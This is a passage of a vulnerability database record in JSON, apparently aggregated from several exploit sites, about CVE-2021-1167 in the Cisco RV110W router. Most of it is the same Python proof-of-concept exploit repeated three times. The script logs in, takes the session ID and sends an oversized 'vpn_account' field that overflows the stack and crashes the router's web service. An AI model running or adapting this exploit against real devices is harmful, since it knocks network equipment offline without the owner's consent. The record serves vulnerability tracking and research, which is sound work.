"NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1167"], "modified": "2021-02-22T00:00:00", "id": "CPAI-2021-0022", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2021-01-14T17:30:10", "description": "", "cvss3": {}, "published": "2021-01-14T00:00:00", "type": "packetstorm", "title": "Cisco RV110W 1.2.1.7 Denial Of Service", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-1167"], "modified": "2021-01-14T00:00:00", "id": "PACKETSTORM:160953", "href": "https://packetstormsecurity.com/files/160953/Cisco-RV110W-1.2.1.7-Denial-Of-Service.html", "sourceData": "`# Exploit Title: Cisco RV110W 1.2.1.7 - 'vpn_account' Denial of Service (PoC) \n# Date: 2021-01 \n# Exploit Author: Shizhi He \n# Vendor Homepage: https://www.cisco.com/ \n# Software Link: https://software.cisco.com/download/home/283879340/type/282487380/release/1.2.1.7 \n# Version: V1.2.1.7 \n# Tested on: RV110W V1.2.1.7 \n# CVE : CVE-2021-1167 \n# References: \n# https://github.com/pwnninja/cisco/blob/main/vpn_client_stackoverflow.md \n# https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-overflow-WUnUgv4U \n \n#!/usr/bin/env python2 \n \n##### \n## Cisco RV110W Remote Stack Overflow. \n### Tested on version: V1.2.1.7 (maybe useable on other products and versions) \n \n \nimport os \nimport sys \nimport re \nimport urllib \nimport urllib2 \nimport getopt \nimport json \nimport hashlib \nimport ssl \n \nssl._create_default_https_context = ssl._create_unverified_context \n \n### \n# Usage: ./CVE-2021-1167.py 192.168.1.1 443 cisco cisco \n# This PoC will crash the target HTTP/HTTPS service \n### \n \n#encrypt password \ndef enc(s): \nl = len(s) \ns += \"%02d\" % l \nmod = l + 2 \nans = \"\" \nfor i in range(64): \ntmp = i % mod \nans += s[tmp] \nreturn hashlib.md5(ans).hexdigest() \n \nif __name__ == \"__main__\": \nprint \"Usage: ./CVE-2021-1167.py 192.168.1.1 443 cisco cisco\" \n \nIP = sys.argv[1] \nPORT = sys.argv[2] \nUSERNAME = sys.argv[3] \nPASSWORD = enc(sys.argv[4]) \nurl = 'https://' + IP + ':' + PORT + '/' \n \n#get session_id by POST login.cgi \nreq = urllib2.Request(url + \"login.cgi\") \nreq.add_header('Origin', url) \nreq.add_header('Upgrade-Insecure-Requests', 1) \nreq.add_header('Content-Type', 'application/x-www-form-urlencoded') \nreq.add_header('User-Agent', \n'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)') \nreq.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8') \nreq.add_header('Referer', url) \nreq.add_header('Accept-Encoding', 'gzip, deflate') \nreq.add_header('Accept-Language', 'en-US,en;q=0.9') \nreq.add_header('Cookie', 'SessionID=') \ndata = {\"submit_button\": \"login\", \n\"submit_type\": \"\", \n\"gui_action\": \"\", \n\"wait_time\": \"0\", \n\"change_action\": \"\", \n\"enc\": \"1\", \n\"user\": USERNAME, \n\"pwd\": PASSWORD, \n\"sel_lang\": \"EN\" \n} \nr = urllib2.urlopen(req, urllib.urlencode(data)) \nresp = r.read() \nlogin_st = re.search(r'.*login_st=\\d;', resp).group().split(\"=\")[1] \nsession_id = re.search(r'.*session_id.*\\\";', resp).group().split(\"\\\"\")[1] \nprint session_id \n \n#trigger stack overflow through POST vpn_account parameter and cause denial of service \nreq2 = urllib2.Request(url + \"apply.cgi;session_id=\" + session_id) \nreq2.add_header('Origin', url) \nreq2.add_header('Upgrade-Insecure-Requests', 1) \nreq2.add_header('Content-Type', 'application/x-www-form-urlencoded') \nreq2.add_header('User-Agent', \n'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)') \nreq2.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8') \nreq2.add_header('Referer', url) \nreq2.add_header('Accept-Encoding', 'gzip, deflate') \nreq2.add_header('Accept-Language', 'en-US,en;q=0.9') \nreq2.add_header('Cookie', 'SessionID=') \npoc = \"a\" * 4096 \ndata_cmd = { \n\"gui_action\": \"Apply\", \n\"submit_type\": \"\", \n\"submit_button\": \"vpn_client\", \n\"change_action\": \"\", \n\"pptpd_enable\": \"0\", \n\"pptpd_localip\": \"10.0.0.1\", \n\"pptpd_remoteip\": \"10.0.0.10-14\", \n\"pptpd_account\": \"\", \n\"vpn_pptpd_account\": \"1\", \n\"vpn_account\": poc, \n\"change_lan_ip\": \"0\", \n\"netbios_enable\": \"0\", \n\"mppe_disable\": \"0\", \n\"importvpnclient\": \"\", \n\"browser\": \"\", \n\"webpage_end\": \"1\", \n} \nr = urllib2.urlopen(req2, urllib.urlencode(data_cmd)) \nresp = r.read() \nprint resp \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/160953/ciscorv110w1217-dos.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2021-12-03T01:58:51", "description": "", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-01-14T00:00:00", "type": "zdt", "title": "Cisco RV110W 1.2.1.7 - (vpn_account) Denial of Service Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1167"], "modified": "2021-01-14T00:00:00", "id": "1337DAY-ID-35676", "href": "https://0day.today/exploit/description/35676", "sourceData": "# Exploit Title: Cisco RV110W 1.2.1.7 - 'vpn_account' Denial of Service (PoC)\n# Exploit Author: Shizhi He\n# Vendor Homepage: https://www.cisco.com/\n# Software Link: https://software.cisco.com/download/home/283879340/type/282487380/release/1.2.1.7\n# Version: V1.2.1.7\n# Tested on: RV110W V1.2.1.7\n# CVE : CVE-2021-1167\n# References: \n# https://github.com/pwnninja/cisco/blob/main/vpn_client_stackoverflow.md \n# https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-overflow-WUnUgv4U\n\n#!/usr/bin/env python2\n\n#####\n## Cisco RV110W Remote Stack Overflow.\n### Tested on version: V1.2.1.7 (maybe useable on other products and versions)\n\n\nimport os\nimport sys\nimport re\nimport urllib\nimport urllib2\nimport getopt\nimport json\nimport hashlib\nimport ssl\n\nssl._create_default_https_context = ssl._create_unverified_context\n\n###\n# Usage: ./CVE-2021-1167.py 192.168.1.1 443 cisco cisco\n# This PoC will crash the target HTTP/HTTPS service\n###\n\n#encrypt password\ndef enc(s):\n l = len(s)\n s += \"%02d\" % l\n mod = l + 2\n ans = \"\"\n for i in range(64):\n\ttmp = i % mod\n\tans += s[tmp]\n return hashlib.md5(ans).hexdigest()\n\nif __name__ == \"__main__\":\n print \"Usage: ./CVE-2021-1167.py 192.168.1.1 443 cisco cisco\"\n\n IP = sys.argv[1]\n PORT = sys.argv[2]\n USERNAME = sys.argv[3]\n PASSWORD = enc(sys.argv[4]) \n url = 'https://' + IP + ':' + PORT + '/' \n\n #get session_id by POST login.cgi\n req = urllib2.Request(url + \"login.cgi\")\n req.add_header('Origin', url)\n req.add_header('Upgrade-Insecure-Requests', 1)\n req.add_header('Content-Type', 'application/x-www-form-urlencoded')\n req.add_header('User-Agent',\n 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')\n req.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')\n req.add_header('Referer', url)\n req.add_header('Accept-Encoding', 'gzip, deflate')\n req.add_header('Accept-Language', 'en-US,en;q=0.9')\n req.add_header('Cookie', 'SessionID=')\n data = {\"submit_button\": \"login\",\n \"submit_type\": \"\",\n \"gui_action\": \"\",\n \"wait_time\": \"0\",\n \"change_action\": \"\",\n \"enc\": \"1\",\n \"user\": USERNAME,\n \"pwd\": PASSWORD,\n \"sel_lang\": \"EN\"\n }\n r = urllib2.urlopen(req, urllib.urlencode(data))\n resp = r.read()\n login_st = re.search(r'.*login_st=\\d;', resp).group().split(\"=\")[1]\n session_id = re.search(r'.*session_id.*\\\";', resp).group().split(\"\\\"\")[1]\n print session_id\n \n #trigger stack overflow through POST vpn_account parameter and cause denial of service\n req2 = urllib2.Request(url + \"apply.cgi;session_id=\" + session_id)\n req2.add_header('Origin', url)\n req2.add_header('Upgrade-Insecure-Requests', 1)\n req2.add_header('Content-Type', 'application/x-www-form-urlencoded')\n req2.add_header('User-Agent',\n 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')\n req2.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')\n req2.add_header('Referer', url)\n req2.add_header('Accept-Encoding', 'gzip, deflate')\n req2.add_header('Accept-Language', 'en-US,en;q=0.9')\n req2.add_header('Cookie', 'SessionID=')\n poc = \"a\" * 4096\n data_cmd = {\n \"gui_action\": \"Apply\",\n \"submit_type\": \"\",\n \"submit_button\": \"vpn_client\",\n \"change_action\": \"\",\n \"pptpd_enable\": \"0\",\n \"pptpd_localip\": \"10.0.0.1\",\n \"pptpd_remoteip\": \"10.0.0.10-14\",\n \"pptpd_account\": \"\",\n \"vpn_pptpd_account\": \"1\",\n \"vpn_account\": poc,\n \"change_lan_ip\": \"0\",\n \"netbios_enable\": \"0\",\n \"mppe_disable\": \"0\",\n \"importvpnclient\": \"\",\n \"browser\": \"\",\n \"webpage_end\": \"1\",\n }\n r = urllib2.urlopen(req2, urllib.urlencode(data_cmd))\n resp = r.read()\n print resp\n", "sourceHref": "https://0day.today/exploit/35676", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2021-01-14T08:44:00", "description": "", "edition": 2, "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-01-14T00:00:00", "type": "exploitdb", "title": "Cisco RV110W 1.2.1.7 - 'vpn_account' Denial of Service (PoC)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1167"], "modified": "2021-01-14T00:00:00", "id": "EDB-ID:49425", "href": "https://www.exploit-db.com/exploits/49425", "sourceData": "# Exploit Title: Cisco RV110W 1.2.1.7 - 'vpn_account' Denial of Service (PoC)\r\n# Date: 2021-01\r\n# Exploit Author: Shizhi He\r\n# Vendor Homepage: https://www.cisco.com/\r\n# Software Link: https://software.cisco.com/download/home/283879340/type/282487380/release/1.2.1.7\r\n# Version: V1.2.1.7\r\n# Tested on: RV110W V1.2.1.7\r\n# CVE : CVE-2021-1167\r\n# References: \r\n# https://github.com/pwnninja/cisco/blob/main/vpn_client_stackoverflow.md \r\n# https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-overflow-WUnUgv4U\r\n\r\n#!/usr/bin/env python2\r\n\r\n#####\r\n## Cisco RV110W Remote Stack Overflow.\r\n### Tested on version: V1.2.1.7 (maybe useable on other products and versions)\r\n\r\n\r\nimport os\r\nimport sys\r\nimport re\r\nimport urllib\r\nimport urllib2\r\nimport getopt\r\nimport json\r\nimport hashlib\r\nimport ssl\r\n\r\nssl._create_default_https_context = ssl._create_unverified_context\r\n\r\n###\r\n# Usage: ./CVE-2021-1167.py 192.168.1.1 443 cisco cisco\r\n# This PoC will crash the target HTTP/HTTPS service\r\n###\r\n\r\n#encrypt password\r\ndef enc(s):\r\n l = len(s)\r\n s += \"%02d\" % l\r\n mod = l + 2\r\n ans = \"\"\r\n for i in range(64):\r\n\ttmp = i % mod\r\n\tans += s[tmp]\r\n return hashlib.md5(ans).hexdigest()\r\n\r\nif __name__ == \"__main__\":\r\n print \"Usage: ./CVE-2021-1167.py 192.168.1.1 443 cisco cisco\"\r\n\r\n IP = sys.argv[1]\r\n PORT = sys.argv[2]\r\n USERNAME = sys.argv[3]\r\n PASSWORD = enc(sys.argv[4]) \r\n url = 'https://' + IP + ':' + PORT + '/' \r\n\r\n #get session_id by POST login.cgi\r\n req = urllib2.Request(url + \"login.cgi\")\r\n req.add_header('Origin', url)\r\n req.add_header('Upgrade-Insecure-Requests', 1)\r\n req.add_header('Content-Type', 'application/x-www-form-urlencoded')\r\n req.add_header('User-Agent',\r\n 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')\r\n req.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')\r\n req.add_header('Referer', url)\r\n req.add_header('Accept-Encoding', 'gzip, deflate')\r\n req.add_header('Accept-Language', 'en-US,en;q=0.9')\r\n req.add_header('Cookie', 'SessionID=')\r\n data = {\"submit_button\": \"login\",\r\n \"submit_type\": \"\",\r\n \"gui_action\": \"\",\r\n \"wait_time\": \"0\",\r\n \"change_action\": \"\",\r\n \"enc\": \"1\",\r\n \"user\": USERNAME,\r\n \"pwd\": PASSWORD,\r\n \"sel_lang\": \"EN\"\r\n }\r\n r = urllib2.urlopen(req, urllib.urlencode(data))\r\n resp = r.read()\r\n login_st = re.search(r'.*login_st=\\d;', resp).group().split(\"=\")[1]\r\n session_id = re.search(r'.*session_id.*\\\";', resp).group().split(\"\\\"\")[1]\r\n print session_id\r\n \r\n #trigger stack overflow through POST vpn_account parameter and cause denial of service\r\n req2 = urllib2.Request(url + \"apply.cgi;session_id=\" + session_id)\r\n req2.add_header('Origin', url)\r\n req2.add_header('Upgrade-Insecure-Requests', 1)\r\n req2.add_header('Content-Type', 'application/x-www-form-urlencoded')\r\n req2.add_header('User-Agent',\r\n 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')\r\n req2.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')\r\n req2.add_header('Referer', url)\r\n req2.add_header('Accept-Encoding', 'gzip, deflate')\r\n req2.add_header('Accept-Language', 'en-US,en;q=0.9')\r\n req2.add_header('Cookie', 'SessionID=')\r\n poc = \"a\" * 4096\r\n data_cmd = {\r\n \"gui_action\": \"Apply\",\r\n \"submit_type\": \"\",\r\n \"submit_button\": \"vpn_client\",\r\n \"change_action\": \"\",\r\n \"pptpd_enable\": \"0\",\r\n \"pptpd_localip\": \"10.0.0.1\",\r\n \"pptpd_remoteip\": \"10.0.0.10-14\",\r\n \"pptpd_account\": \"\",\r\n \"vpn_pptpd_account\": \"1\",\r\n \"vpn_account\": poc,\r\n \"change_lan_ip\": \"0\",\r\n \"netbios_enable\": \"0\",\r\n \"mppe_disable\": \"0\",\r\n \"importvpnclient\": \"\",\r\n \"browser\": \"\",\r\n \"webpage_end\": \"1\",\r\n }\r\n r = urllib2.urlopen(req2, urllib.urlencode(data_cmd))\r\n resp = r.read()\r\n print resp", "sourceHref": "https://www.exploit-db.com/download/49425", "cvss": {"score": 0.0, "vector": "NONE"}}]}